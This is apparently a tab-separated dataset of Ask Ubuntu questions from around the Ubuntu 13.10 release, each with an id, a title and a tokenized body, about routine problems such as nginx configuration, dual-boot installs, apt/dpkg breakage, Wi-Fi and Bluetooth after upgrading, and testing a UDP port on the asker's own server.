369101	what is the simplest way to set up a mail server ?	the fact is : i need to get somehow an email adress like `` admin @ exampledomain.net '' i tried a couple of tutorials that screwed my server and i had to reset it ; so : how to setup it in the simplest way ? yes , i own a server ( ubuntu 13.04 x86_64 ) yes , i also own mydomain.net ( given that my domain is `` exampledomain.net '' , my hostname is `` exampledomain '' , will this give problems ? cause it gave me lots )
369102	likewise , mount after login to domain	i installed likewise on my ubuntu machine ( 12.04 ) . i succeed to join the computer to the domain and make ubuntu ask me for pam and disable guest account . what i could n't figure out is how to make the users get their mapping drives from the server ( or manually ) . i have tried some solutions like adding the mount command to the /etc/fstab , but because i added myself to the ubuntu , the path is changing from users to users . the bottom line is , that i am trying to write down a login script that will map the drives by group id ( gid ) . can someone please send me a script template or suggest another solution ?
369105	what is ubuntu 's policy on keeping old kernels	i 've just run out of disk space on / . looking into the situation i realised that since first installing 12.04 , ubuntu has upgraded the kernel ~23 times and has kept every old kernel , binaries and header sources . i 've just manually apt-get purge-ed all but the last couple , saving ~4gb space ( on a 20gb partition , so that 's v. significant ) . why would ubuntu want to keep all of those ? is it lack of a feature such as `` keep last 4 '' or is there some other reason ?
369106	nginx : cant see index html	i use ubuntu 13.10 + nginx ( from repos ) , but i have one problem : i cant see in browser my local index.hmtl ( with help nginx ) . install : sudo apt-get install nginx make dirs for my static files sudo mkdir /opt/nginx/files & & sudo mkdir /opt/nginx/img sudo chown www-data : www-data /opt/nginx/ /opt/nginx $ ls -la drwxr-xr-x 4 www-data www-data 4096 oct. 31 19:57 . drwxr-xr-x 8 www-data www-data 4096 oct. 31 19:57 .. drwxr-xr-x 2 root root 4096 oct. 31 20:02 files drwxr-xr-x 2 root root 4096 oct. 31 19:57 img in /etc/nginx/nginx.conf user www-data ; worker_processes auto ; pid /run/nginx.pid ; events { worker_connections 768 ; # multi_accept on ; } http { # # # basic settings # # sendfile on ; tcp_nopush on ; tcp_nodelay on ; keepalive_timeout 65 ; types_hash_max_size 2048 ; # server_tokens off ; # server_names_hash_bucket_size 64 ; # server_name_in_redirect off ; include /etc/nginx/mime.types ; default_type application/octet-stream ; # # # logging settings # # access_log /var/log/nginx/access.log ; error_log /var/log/nginx/error.log ; # # # gzip settings # # gzip on ; gzip_disable `` msie6 '' ; gzip_vary on ; # gzip_proxied any ; gzip_comp_level 6 ; # gzip_buffers 16 8k ; gzip_http_version 1.1 ; gzip_types text/plain text/css application/json application/x-javascript text/xml application/xml application/xml+rss text/javascript ; # # # nginx-naxsi config # # # uncomment it if you installed nginx-naxsi # # # include /etc/nginx/naxsi_core.rules ; # # # nginx-passenger config # # # uncomment it if you installed nginx-passenger # # # passenger_root /usr ; # passenger_ruby /usr/bin/ruby ; # # # virtual host configs # # include /etc/nginx/conf.d/*.conf ; include /etc/nginx/sites-enabled/* ; server { listen 80 ; server_name filestorange ; error_page 404 /404.html ; # access_log logs/localhost.access.log main ; location / { root /opt/nginx/files ; index index.html ; } location /404.html { root /opt/nginx/files ; } } } then i use sudo nginx -s reload sudo service nginx restart but in localhost in browser i see : if you see this page , the nginx web server is successfully installed and working . further configuration is required . i need to see my index.html file ( its in /opt/nginx/files ) . how to fix it ? thanks !
369108	problem with nm-applet in xubuntu 13.10 : nm-applet : failed to register as an agent : ( 32 ) session not found	i recently upgraded to xubuntu 13.10 i can still use the networkmanager but the indicator icon is gone after the upgrade if i start it manually , i get this error : ** ( nm-applet:5632 ) : warning ** : could not initialize nmclient /org/freedesktop/networkmanager : rejected send message , 3 matched rules ; type= '' method_call '' , sender= '' :1.54 '' ( uid=1000 pid=5632 comm= '' nm-applet `` ) interface= '' org.freedesktop.dbus.properties '' member= '' getall '' error name= '' ( unset ) '' requested_reply= '' 0 '' destination= '' org.freedesktop.networkmanager '' ( uid=0 pid=930 comm= '' networkmanager `` ) ** message : applet now removed from the notification area ** ( nm-applet:5632 ) : warning ** : failed to register as an agent : ( 32 ) session not found how can i get the nm-applet back ? i had another problem after update with the sound-indicator , but solved it like this : http : //askubuntu.com/a/369093/34298 if i try dbus-launch nm-applet -- sm-launch & i get the error ** ( nm-applet:12425 ) : warning ** : could not initialize nmclient /org/freedesktop/networkmanager : the name org.freedesktop.networkmanager was not provided by any .service files ** message : applet now removed from the notification area ** ( nm-applet:12425 ) : warning ** : failed to register as an agent : ( 2 ) the name org.freedesktop.networkmanager was not provided by any .service files ** message : using fallback from indicator to gtkstatusicon
369112	nuvola player - no sound under ubuntu 13.10	nuvolaplayer does not output any sound under ubuntu 13.10 . i 've tried uninstalling and reinstalling , and i note that on reinstallation , there seems to be an error : create symlink to plugin in /usr/lib/mozilla/plugins : failed !
369116	problem installing ubuntu 12.04 on sony vaio with windows 8 and uefi	i 'm trying to install ubuntu 12.04.3 on my sony vaio with windows 8 pre-installed . i want to have a dual boot setup . if boot is set to uefi mode , i can not boot from the livecd . so i set it to legacy mode and i could boot from the live cd and install it . the setup went fine . i could allocate 100gb for ubuntu . eventually i had to restart after installation . now it happens that : if boot to legacy mode , an error message appears when i switch on the notebook . the error says operationg system not found . so neither can i boot windows 8 nor ubuntu . if boot is in uefi mode , windows 8 boots normally . there is no request to choose between windows or ubuntu if i try to install ubuntu again , it recognizes the installation . i tried to reinstall over it , but the system still behaves as described above what i should do to have my dual boot working well with both windows and ubuntu ? note : ubuntu works perfectly from the livecd
369117	guide to install ubuntu on lenovo y510p	hello everyone i have recently bought a lenovo y510p laptop and having trouble installing ubuntu on it . i 'm getting a black screen when trying to install from live-usb i have increased the brightness as suggested in some other answers and was able to see the ubuntu logo and once that is done loading i 'm again presented with a black screen . i 'm totally new to ubuntu and so i want someone to help me with a step by step guide on how to install ubuntu on my laptop . i 'm trying to install ubuntu 13.10 so plz some one help me .
369120	output from 'ls ' differs when in root mode	when i use the command sudo -i and input the password , and then input ls , i found that i can only see the desktop folder and packages in terminal . but when i came back to normal mode , all the folder showed up . i do n't know what cause this problem ... can someone help me ?
369127	juju wordpress charm does n't update from git	i have set the wp-config string to my git repo . it gets everything fine but the charm is not picking up changes . i make changes to my local copy of the wp-content then push it to my git remote repo expecting the charm to detect the changes and pull it but nothing happens . do i have to manually tell juju to check for a new revision ? also is there any way to have juju pull a certain branch ? this way i can have another juju charm for the development branch rather than separating the development to a different repo .
369130	update ubuntu from 13.04 to 13.10	if i update ubuntu from 13.04 to 13.10 , it will delete all the installed softwares.. ? it will delete any of my data.. ? i 'm totally new to ubuntu .
369134	why do i have to access software through a folder rather than in the dash ?	in this case , the software is blender . i followed the instructions on blender.org , and it all works . but , when i click on blender in the dash , it runs version 2.62 , which is what i got with apt-get . if i want the latest version that i downloaded from the website ( 2.68a ) , i have to go into the folder that was extracted from the .tar.bz2 file and click on blender in there . is n't there a way to connect the icon in the dash with the last one i downloaded , so i do n't have to keep going through the file system ?
369141	how could i flash ubuntu touch onto an htc droid incredible 2	after reading through the directions i was under the impression that entry level smart phones could run this operating system , but after hours of getting nowhere , i have come to the conclusion that this operating system will only work on the nexus phones .
369145	installing only ubuntu on a vista/ubuntu pc with separate hard drives	i installed a 160gb hard drive d : and installed ubuntu on that drive using windows installer ( wubi ) . i am running vista on the c : drive ( 320 gb ) and am using dual boot to access either ubuntu or vista when i boot up . i have recently purchased a windows 8 pc ( grrr ! ) but under the circumstancs do not want or need the vista operating system on the other pc . what i would like to do is the following : 1 . transfer all my files to the win 8 pc 2 . switch the 160 gb drive to be my c : drive and the 320 gb drive to be my d : drive 3. install ubuntu 12 on the 'new ' c : drive and use the d : drive for files and programs on the original install of ubuntu , i partitioned the 160 gb drive for u9.04 but it is all tied to dual boot and was done through wubi . i 'm sure new versions of ubuntu will require different partitioning setups anyway.if i could i would like to just clean everything out and start from scratch . i run free programs mostly , but anything i need like printers web cams , router , etc . i have software for . as far as personal data i can save everything off to external drives and reload later as needed . i do n't know if i can just wipe both hard drives clean , then reset my bios to recognize the 'new ' drive setup , then start installing ubuntu . sounds too simple ! please let me know the proper approach . thank you
369146	ubuntu in virtual box in a macbook pro crashed during installation	i have a mac book pro and i need to test ubuntu under virtual machine . i have downloaded both xubuntu 13.10 64bit both ubuntu 12.04 64bit i have downloaded virtual box , created a new machine ( with all default settings ) and set the .iso file downloaded from the website ( no dmg transformation , just plain .iso download ) and.. ubuntu is crashing during the installation just after time zone setting and xubuntu crashes just before the installation..
369151	problem playing some youtube videos	i 've recently installed ubuntu 12.04 on some friend machine . he 's migrating from windows xp , and i 'm his guide . right now he 's having a problem with some youtube videos . http : //www.youtube.com/watch ? v=7abnusndcni all the videos from that yt user seems to have the same trouble . problem is , when going to full screen , my friend sees this : so i try the video here , on my job 's pc , were also have ubuntu 12.04 , and see it fine . i ask him about the browser . google chrome . ask him then to try firefox , and says that in firefox it works fine . i 'm on firefox too . when i try the video on chrome here on my job , i do see it ok in fullscreen , but , i notice that chrome takes a few seconds to actually maximize it . that is , it 's costly for chrome to go fullcreen . then try another video from another youtube user in chrome , and it goes fullscreen fine . so , something 's wrong with those videos . as i go everywhere installing ubuntu , and have no idea of what is going on here , i would like to learn what is happening here . my friend has a nvidia geforce 9800 gt with 319 drivers . i have an old legacy ati here on my job . any clue ?
369158	ubuntu 12.04 amd64 `` grub-efi-amd64-signed '' could'nt be installed	hey i am trying for the first time to set up a computer on my own . after multiple problems i could solve on my own and with the help of our beloved friend the internet i finally ended up here . i am trying to install ubuntu 12.04 amd64 on my new lenovo thinkpad edge e330 nzsdzge ( intel core i3-3120m ( 2.5 ghz ) ; 4gb ram ; 500 gb hard drive ) . during the installation an error occures which says : '' the package `` grub-efi-amd64-signed '' could'nt be installed in /target/ . the installed system will not work without the grub-bootloader . '' i have already tried googling it but i ca n't find any solution . i read somewhere that it might help to disable secure boot but it was already disabled . please help me i ca n't figure this one out on my own . thanks , adrian . edit : what i have forgotten to say : i am trying to boot by usb i translated the error message from german to english myself . it might not be the exact wording of the original message in english . edit2 : now i tried to install ubuntu 13.10 instead . it worked fine . but i think this problem still needs to be solved .
369163	how can i resolve or diagnose major stability issues after upgrading to 13.10	i have been running 13.04 pretty successfully on my lenovo t430 ( recent machine - purchased in feb 2013 , core i5-3320m cpu , 8gb ram ) for many months . i decided to upgrade to 13.10 over the weekend , and since then my machine has been unstable in a number of ways - the most annoying is that the ui has been completely hanging multiple times a day - at least once a day since then , often 2 or 3 times a day . the hangs usually involve the gui locking to the point where the mouse still moves around , but nothing else works - and i have to go to a virtual console and kill the gnome-session . twice it has hung to the point where i ca n't get to a virtual console and have had to hard-reboot . i do n't know if it is related , but i 've also noticed that the 'ubuntu software center ' seems to crash immediately every time i try to start it . i have installed a few apps ( like darktable ) from separate ppas , but i do n't believe i 've installed anything 'core ' from these systems . the one 'abnormal ' thing that i had done under 13.04 was to switch to the gnome ui instead of unity ( after unity stopped working for me after a 13.04 update ) . i did do a clean install of 13.10 on a separate partition and then installed the gnome ui , and i saw the ubuntu software center crash there also - although i have n't run it long enough to see if the ui hangs happen . i also tried installing the 'gnome ubuntu ' pre-built image , and at least ubuntu software center worked . this is my daily machine for work , so i need it to be stable . i 'd rather not go back to a clean system and set things up from scratch , but i can if necessary . my current plan of attack so far is to start with the clean 'gnome ubuntu ' image and rebuild things - although a way to re-stabilize my existing system would be a big improvement ... any advice on better ways to get back to a stable system ?
369164	can not install packages in ubuntu server 12.04 running in virtualbox	i install ubuntu 12.04 lts in virtualbox and i have access to internet when ping 8.8.8.8 or google.com.but when i want to install packages terminal say : unable to locate package . my codes looks like : sudo apt-get install dhcp3-server sudo apt-get install xubuntu-desktop can anybody help me to solve this problem ?
369165	ubuntu 13.10 not booting	i can not start ubuntu 13.10 on my laptop ! i burned 2 cds and made a bootable pendrive but when i reboot my pc it start windows 7 , but when i try to boot ubuntu 13.04 it starts normally . sorry for the grammar errors , i 'm not a native speaker . edit : i 'm using the 64bit version
369166	wi-fi..ethernet..nothing works for 13.10	i 've been at this for a couple of days . ca n't find a solution that works . did the trial of 13.1 and everything worked great . as soon as i did the install on my laptop ( dell vostro 1520 ) i ca n't get any type of connection whatsoever . wi-fi is n't working because i need to install the broadcom sta driver . the one on my computer , according to the forums , is broken . i tried bringing it over from another web-capable laptop and fresh installing it but it 's ( ubuntu ) still telling me it ca n't access the web , and therefore ca n't install it . i 'm sure everyone can see flaw here . so , i then try to use ethernet to do this . according to my network connections , i 'm connected . according to anything i do to try to actually access the network , i 'm not connected to anything . my computer does n't acknowledge any available wi-fi connections whatsoever . terminal is seeming pretty useless , as pretty much every route i 'm taking it 's telling me it ca n't . this is beyond frustrating . i 've never had this much trouble connecting to a network in my life . please help . i 'll be happy to answer any questions . thanks a ton
369167	can not add/change keyboard layout on xfce	i have a computer running ubuntu server . i installed it with no gui , but now i sometimes need to do something requiring x , so i chose to install xfce . however , i can not change or add any keyboard layouts : do i need to install something , or how do i fix this ? thanks
369168	internet not working after upgrad to 13.10	after upgrading from 13.04 to 13.10 , i ca n't connect anymore . i have an hp pavilion . it 's strange because sometimes is telling me `` no wireless networks found . `` , and sometimes is seeing the connections , but wo n't work . in network is telling me `` the system network services are not compatible with this version '' i do n't know a lot about ubuntu , sorry . i just hope there are magic words to put in the terminal to resolve this problem ! thank you very much ! stefano
369169	dropbox downloads next file and then hangs per every start	i have a strange problem with dropbox on notebook with ubuntu 13.10 ( the problem also existed in ubuntu 13.04 ) . when i start dropbox , it downloads a single file ( it 's an ordinary photo , 2-3 mb ) and then hangs . the message is `` downloading 10 files '' . i also get the following error in the terminal : ( dropbox:22359 ) : glib-gobject-warning ** : /build/buildd/glib2.0- 2.38.1/./gobject/gsignal.c:2475 : signal 'child-added ' is invalid for instance '0xa2a4070 ' of type 'gtkmenu' if i run dropbox status it gives dropbox is n't responding . then i stop and start dropbox again , it downloads the next file and hangs with `` downloading 9 files '' . so basically i need to restart dropbox to download every next file . dropbox on my work machine is working fine ( the same files ) . i tried to fully reinstall and reconnect dropbox , it did n't work . can anyone help ?
369171	ubuntu keyboard shortcuts not working when i reboot	i have assigned shortcuts for volume up , volume down and volum mute in shortcuts window . but whenever i reboot or logoff system , this shortcuts are n't working . when i open the shortcuts dialog window i am seeing shortcuts that i have assigned before reboot system . how can i solve this problem .
369172	video lag in vlc and totem	i have an ati video card in my dell inspiron , i 'm getting some offset of audio/video ( out of sync ) wondering if i can do upgrades to solve this
369177	how to show my computer on ubuntu 13.10	i am very new to ubuntu . i just installed the 13.10 and it seems i ca n't find the `` my computer '' ( you know , that one with the partitions and stuff ) . i am very sure this was asked a million times but i ca n't find an answer . please , help me asap . thank you very much !
369178	conky text overlaps with other text	some of the text part of conky are overlapping with itself . as you can see in the 3rd bubble form the top `` disks '' is hidden under root , home , and date . i want it to look like this : i have installed the conky manager using this method . but i ca n't seem to fix it .
369179	determine if udp socket can be accessed via external client	i do n't have access to company firewall server . but supposedly the port 1720 is open on my one ubuntu server . so i want to test it with netcat : sudo nc -ul 1720 the port is listening on the machine itself : sudo netstat -tulpn | grep nc udp 0 0 0.0.0.0:1720 0.0.0.0 : * 29477/nc the port is open and in use on the machine itself : lsof -i -n -p | grep 1720 gateway 980 myuser 8u ipv4 187284576 0t0 udp *:1720 checked the firewall on current server : sudo ufw allow 1720/udp skipping adding existing rule skipping adding existing rule ( v6 ) sudo ufw status verbose | grep 1720 1720/udp allow in anywhere 1720/udp allow in anywhere ( v6 ) but i try echoing data to it from another computer ( i replaced the x 's with the real integers ) : echo `` some data to send '' | nc xx.xxx.xx.xxx 1720 but it did n't write anything . so then i try with telnet from the other computer as well : telnet xx.xxx.xx.xxx 1720 trying xx.xxx.xx.xxx ... telnet : connect to address xx.xxx.xx.xxx : operation timed out telnet : unable to connect to remote host although i do n't think telnet works with udp sockets . i ran nmap from another computer within the same local network and this is what i got : sudo nmap -v -a -su -p 1720 xx.xxx.xx.xx starting nmap 5.21 ( http : //nmap.org ) at 2013-10-31 15:41 edt nse : loaded 36 scripts for scanning . initiating ping scan at 15:41 scanning xx.xxx.xx.xx [ 4 ports ] completed ping scan at 15:41 , 0.10s elapsed ( 1 total hosts ) initiating parallel dns resolution of 1 host . at 15:41 completed parallel dns resolution of 1 host . at 15:41 , 0.00s elapsed initiating udp scan at 15:41 scanning xtremek.com ( xx.xxx.xx.xx ) [ 1 port ] completed udp scan at 15:41 , 0.07s elapsed ( 1 total ports ) initiating service scan at 15:41 initiating os detection ( try # 1 ) against xtremek.com ( xx.xxx.xx.xx ) retrying os detection ( try # 2 ) against xtremek.com ( xx.xxx.xx.xx ) initiating traceroute at 15:41 completed traceroute at 15:41 , 0.01s elapsed nse : script scanning xx.xxx.xx.xx . nse : script scanning completed . nmap scan report for xtremek.com ( xx.xxx.xx.xx ) host is up ( 0.00013s latency ) . port state service version 1720/udp closed unknown too many fingerprints match this host to give specific os details network distance : 1 hop traceroute ( using port 1720/udp ) hop rtt address 1 0.13 ms xtremek.com ( xx.xxx.xx.xx ) read data files from : /usr/share/nmap os and service detection performed . please report any incorrect results at http : //nmap.org/submit/ . nmap done : 1 ip address ( 1 host up ) scanned in 2.04 seconds raw packets sent : 27 ( 2128b ) | rcvd : 24 ( 2248b ) . the only thing i can think of is a firewall or vpn issue . is there anything else i can check for before requesting that they look at the firewall server again ?
369182	hardware compatibility	i am looking into buying a lenovo rd330 server with a thinkserver raid 500 adapter ii raid controller . i am having problems finding out if all of the hardware that i am wanting will be compatible with ubuntu . i have check the `` certified hardware '' list but the list is very limited . both the computer and the raid controller say they support redhat and suse but obviously ubuntu is n't mentioned . i have talked with my vendor and they also not certain if this hardware will work . i have also google around and the raid controller appears to be an lsi chipset . but again i have n't been able to find any definitive information saying that this will work . any suggestions on how i can find out if the hardware will work ?
369191	bluetooth mouse no longer paired after resuming from suspend since upgrading to 13.10	since upgrading to 13.10 from 13.04 my mouse no longer connects via bluetooth . in settings it states that the mouse is not paired . restarting bluetooth with sudo /etc/init.d/bluetooth restart does not help . restarting the computer does fix the problem if bluetooth is restarted also with the previously mentioned command , but this is not ideal . the mouse worked fine prior to updating to 13.10 . the computer is a thinkpad x230 with a broadcom 'bcm20702a0 ' bluetooth module ( i think ) . when it is not working hciconfig hci0 -a returns : hci0 : type : br/edr bus : usb bd address : c0:18:85 : db : f3 : d1 acl mtu : 1021:8 sco mtu : 64:1 up running pscan rx bytes:766129 acl:49888 sco:0 events:2233 errors:0 tx bytes:5953 acl:240 sco:0 commands:274 errors:0 features : 0xbf 0xfe 0xcf 0xfe 0xdb 0xff 0x7b 0x87 packet type : dm1 dm3 dm5 dh1 dh3 dh5 hv1 hv2 hv3 link policy : rswitch sniff link mode : slave accept name : 'bcm20702a' class : 0x6e0100 service classes : networking , rendering , capturing , audio , telephony device class : computer , uncategorized hci version : 4.0 ( 0x6 ) revision : 0x1000 lmp version : 4.0 ( 0x6 ) subversion : 0x220e manufacturer : broadcom corporation ( 15 ) when it is working hciconfig hci0 -a returns : hci0 : type : br/edr bus : usb bd address : c0:18:85 : db : f3 : d1 acl mtu : 1021:8 sco mtu : 64:1 up running pscan rx bytes:253334 acl:16391 sco:0 events:842 errors:0 tx bytes:2519 acl:65 sco:0 commands:84 errors:0 features : 0xbf 0xfe 0xcf 0xfe 0xdb 0xff 0x7b 0x87 packet type : dm1 dm3 dm5 dh1 dh3 dh5 hv1 hv2 hv3 link policy : rswitch sniff link mode : slave accept name : 'ubuntu-0' class : 0x6e0100 service classes : networking , rendering , capturing , audio , telephony device class : computer , uncategorized hci version : 4.0 ( 0x6 ) revision : 0x1000 lmp version : 4.0 ( 0x6 ) subversion : 0x220e manufacturer : broadcom corporation ( 15 ) i am a relative novice with linux so do n't ask me compile anything please , but i can use google . update 1 : i noticed when i checked the bluetooth settings page that the mouse is reported as being not paired even while it is operating correctly . i have tested with a bluetooth headset now also and it gives similar issues ( no sound after resume from sleep ) , but in this case it is being reported as paired .
369192	how to exit apt-get ?	when i try to install new software from the ubuntu software center , it says `` waiting for apt-get to exit '' . how i can exit apt-get ?
369193	ubuntu freezes after wake when upgraded to 13.10	i upgraded to ubuntu 13.10 : networking ( wifi and lan ) wo n't work after resume from suspend . black screen appears sometimes i 'm tired of rebooting . i 've seen many posts about this but they do n't solve this problem . will ubuntu fix this in an update or do i have to return to 13.04 : ( . i will never upgrade ever again .
369195	how can i install ubuntu 13.10 on a samsung ativ book 9 lite ? ( screen turns off )	i already tried to with install ubuntu 13.10 on my samsung ativ book 9 lite with the uefi and cms os option in the bios , but i still have the same problem . i 'm trying to install ubuntu 13.10 from a usb drive . the grub menu appears , so when i click on the first or second options , in both cases i see the startup screen , and then the screen turns off and nothing happens after that . what else do i need to do ?
369198	cinnamon settings blank after update	using ubuntu 12.04 with the cinnamon desktop , i installed the most recent updates and now when i open `` system settings '' the entire window appears as a blank white screen . the headers for appearance , preferences , and hardware are present , but the usual icons for *background , *hot corners , *printers , etc . are no longer visible . some of these settings can still be altered via the terminal : cinnamon-settings backgrounds cinnamon-settings applets cinnamon-settings mouse and touchpad but other commands , such as cinnamon-settings hot corners are met with an error . this is obviously a problem with cinnamon , so i just want to bring it to attention and find out when they plan on fixing the bug . a workaround can be found on the web , but it seems way to risky to rely on .
369199	how to use my personal keyboard layout ?	i read few topic about customizing personal keyboard layout or creating new one . i create a balochi language keyboard layout for my self . following is the contet of `` blc '' file in /usr/share/x11/xkb/symbols/ which i created : default partial alphanumeric_keys modifier_keys xkb_symbols `` blc '' { name [ group1 ] = `` baloc ( blc ) '' ; // alphanumeric section key < tlde > { [ ŕ , ř ] } ; key < ae01 > { [ 1 , exclam ] } ; key < ae02 > { [ 2 , at ] } ; key < ae03 > { [ 3 , semicolon ] } ; key < ae04 > { [ 4 , colon ] } ; key < ae05 > { [ 5 , percent ] } ; key < ae06 > { [ 6 , apostrophe ] } ; key < ae07 > { [ 7 , quotedbl ] } ; key < ae08 > { [ 8 , asterisk ] } ; key < ae09 > { [ 9 , parenleft ] } ; key < ae10 > { [ 0 , parenright ] } ; key < ae11 > { [ minus , underscore ] } ; key < ae12 > { [ equal , plus ] } ; key < ad01 > { [ q , q ] } ; key < ad02 > { [ w , w ] } ; key < ad03 > { [ e , e ] } ; key < ad04 > { [ r , r ] } ; key < ad05 > { [ t , t ] } ; key < ad06 > { [ y , y ] } ; key < ad07 > { [ u , u ] } ; key < ad08 > { [ i , i ] } ; key < ad09 > { [ o , o ] } ; key < ad10 > { [ p , p ] } ; key < ad11 > { [ è , è ] } ; key < ad12 > { [ ù , ù ] } ; key < ac01 > { [ a , a ] } ; key < ac02 > { [ s , s ] } ; key < ac03 > { [ d , d ] } ; key < ac04 > { [ f , f ] } ; key < ac05 > { [ g , g ] } ; key < ac06 > { [ h , h ] } ; key < ac07 > { [ j , j ] } ; key < ac08 > { [ k , k ] } ; key < ac09 > { [ l , l ] } ; key < ac10 > { [ à , à ] } ; key < ac11 > { [ ś , ś ] } ; key < ab01 > { [ z , z ] } ; key < ab02 > { [ x , x ] } ; key < ab03 > { [ c , c ] } ; key < ab04 > { [ v , v ] } ; key < ab05 > { [ b , b ] } ; key < ab06 > { [ n , n ] } ; key < ab07 > { [ m , m ] } ; key < ab08 > { [ ť , ť ] } ; key < ab09 > { [ ď , ď ] } ; key < ab10 > { [ ž , ž ] } ; key < bksl > { [ question , slash ] } ; // end alphanumeric section } ; i saved that file and restart my laptop but i can not find my keybord layout in keyboard layout setting to use it ? what is wrong ? plz
369201	sharing external hdd from mac - ubuntu	pulling my hair out trying to get my external hdd to read / write on ubuntu and my mac . can somebody please please tell me what 's the best file system to allow both operating systems equal and reliable access . any help will be appreciated ! if there 's a really simple answer i apologise in advance i 'm a complete newbie to ubuntu . thanks .
369202	macbookpro6,1 error when using nvidia blob on boot	i 've got a macbookpro6,1 running ubuntu 13.10 with the proprietary blob . i 'm booting in efi mode , and basically all of the installer defaults . booting with noveau works fine , but as soon as i install nvidia-current and restart , i briefly see the boot splash , but the screen goes black and i ca n't switch to a tty . i was able to ssh in and get the dmesg output , though . http : //pastebin.com/3c5gwxvm it looks like something is going wrong when the nvidia module is being loaded . something acpi related . any ideas ? i sure would like to be able to use the binary driver .
369204	can not install or update , problem with apt-get ubuntu 12.04.03 server	i am unable to install anything on my ubuntu server . when i do , i get the suggestion to run apt-get -f install when i try running apt-get -f install i get : apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : python-gnupginterface python-zope.interface the following new packages will be installed : python-gnupginterface python-zope.interface 0 upgraded , 2 newly installed , 0 to remove and 61 not upgraded . 2 not fully installed or removed . need to get 0 b/133 kb of archives . after this operation , 692 kb of additional disk space will be used . do you want to continue [ y/n ] ? y global symbol `` $ bundling '' requires explicit package name at /usr/share/perl/5.14/getopt/long.pm line 77 . global symbol `` $ bundling '' requires explicit package name at /usr/share/perl/5.14/getopt/long.p line 84 . begin not safe after errors -- compilation aborted at /usr/share/perl/5.14/getopt/long.pm line 208 . compilation failed in require at /usr/share/perl5/debconf/config.pm line 173. dpkg : error : parsing file '/var/lib/dpkg/status ' near line 5912 package 'libboost-iostreams1.46.1 ' : 'depends ' field , reference to 'zlib1g ' : error in version : epoch in version is not number e : sub-process /usr/bin/dpkg returned an error code ( 2 ) and if i try running dpkg -- configure -a i get : dpkg -- configure -a setting up gconf2 ( 3.2.5-0ubuntu2 ) ... xxx lineno : 400 , opcode : 0 traceback ( most recent call last ) : file `` /usr/lib/python2.7/site.py '' , line 68 , in < module > import os file `` /usr/lib/python2.7/os.py '' , line 49 , in < module > import posixpath as path file `` /usr/lib/python2.7/posixpath.py '' , line 17 , in < module > import warnings file `` /usr/lib/python2.7/warnings.py '' , line 400 , in < module > del _warnings_defaults systemerror : unknown opcode dpkg : error processing gconf2 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of libcanberra-gtk-module : i386 : libcanberra-gtk-module : i386 depends on gconf2 ( > = 2.28.1-2 ) ; however : package gconf2 is not configured yet . dpkg : error processing libcanberra-gtk-module : i386 ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : gconf2 libcanberra-gtk-module : i386 i have no idea where to go from here and would greatly appreciate any help anyone has to offer . thanks !
369205	missing libncurses.so.5	i was installing free pascal ide on ubuntu 12.04 at x64 amd . when i run fp file it says : ./fp : error while loading shared libraries : libncurses.so.5 : can not open shared object file : no such file or directory i searched google and found out that i have libncurses.so.5 library installed as /lib/x86_64-linux-gnu/libncurses.so.5.9 and link pointing at it /lib/x86_64-linux-gnu/libncurses.so.5 so i created a link in /lib pointing at /lib/x86_64-linux-gnu/libncurses.so.5 now fp file found library , but it 's not pleased with it ... ./fp : error while loading shared libraries : libncurses.so.5 : wrong elf class : elfclass64 is ok to create link to link ? am i missing a library or is it just not installed correctlly ?
369206	normalize volume of mpeg-4 aac tunes purchased from itunes ?	i 've been very satistied using a combination of picard and quodlibet to calcuate replay gain tag values for me mp3s . anyone know how to do this with aac songs ? edit : i usually use rhythmbox and quodlibet for listening .
369210	apache responds on one ip but not another	i have ubuntu server 12.04.3 and i 'm trying to get the web server working . this machine has two ethernet ports . eth0 is connected to the internet , and has an ip address assigned by the router . eth1 is connected to the local network , and hands out ip addresses for the ( not internet-connected ) pcs and devices there . if i open a browser on another machine that is also connected to the two networks , i can connect to the eth0 ip address , and it shows the expected webpage , but if i connect to the eth1 ip address , then i just get a blank page . it does n't report that the server could not be found ; it 's as if apache is there but not serving anything up . i have webmin and ssh-server installed , and i can access these through either ip address . in the webmin panel for apache , it says that it is listening on all ips . i told it only to listen on the eth0 ip , and now my browser says that the server 'eth1-ip ' was not found . next , i told it only to listen on that ip address , and it still served a blank page on that ip , but could n't be connected to from the eth0 ip address . in the browser console , it shows that the page reports its status as 200 ok , but that the data transferred totals 0 bytes . the windows 2000 install that i 'm hoping to replace with ubuntu works fine through the problematic network port . i 'm very new to this , so i 'm sorry if this is a really silly problem , or if i 'm posting this in the wrong place .
369211	clonezilla/partclone says target partition size is smaller than source- except its not ?	i am copying a 120gb ssd containing ubuntu and windows 7 to a 240gb ssd . i booted in windows and formatted the 240gb as one ntfs partition . when i use clonezilla everything seems to go well but then partclone reports that my target petition size is smaller than my source . my source partition seems correct- but the target partition size is not 240gb , but is about 54gb ? ? ? ? how should i proceed ? i am just about to use a windows cd to format the new 240gb ssd and attempt to create a 240gb partition , rather than 54gb ... . edit windows installation couldnt see the ssd ( its connected via usd caddy ) when i log in to windows it shows the whole disc as being one partition of 223gb ...
369215	getting file system free space	this is n't a problem as such , more a request for information based on ignorance of the linux filesystem . the very short question is : how do i find out how much free and used space there is on the volume from which ubuntu is running ? more detail : i 'm running ubuntu 12.04 from a 64gb usb3 stick , created from booting up a year-old ubuntu 12.04 dvd and running startup disk creator . the reason for this is that the master boot record on my hard disk , holding windoze 7 , has gone belly-up , and whilst awaiting a recovery disk i 'm running ubunto off usb or dvd as a 'trial ' . ( and will continue to run ubuntu after restoring windoze , as i 've rediscovered my love of the penguin : o ) ) after installing ubuntu on the stick i ran the software update app , which downloaded some 450mb of updates and took a couple of hours to install to the stick . a couple of times i got a message saying that disk space was short . so i looked in the file manager ( or whatever it 's called these days ) and could n't see the stick listed , just : system hard disk ( listed as 479gb filesystem ) two other partitions that had been created by windoze '' 4.3gb filesystem '' which when i try to open gives the error `` could not find /cow '' , and when i try to unmount it tells me i ca n't because it 's not mounted - d'oh ! ! edit : screenshot of file manager edit : screenshot of low disk space warning what i ca n't see is the usb stick from which i 'm running ubuntu . where 's it gone , anybody know ? this is tangentially related to a previous question of mine about system tools , in that i 'm trying to get control and knowledge of the system in the newest incarnation of ubuntu .
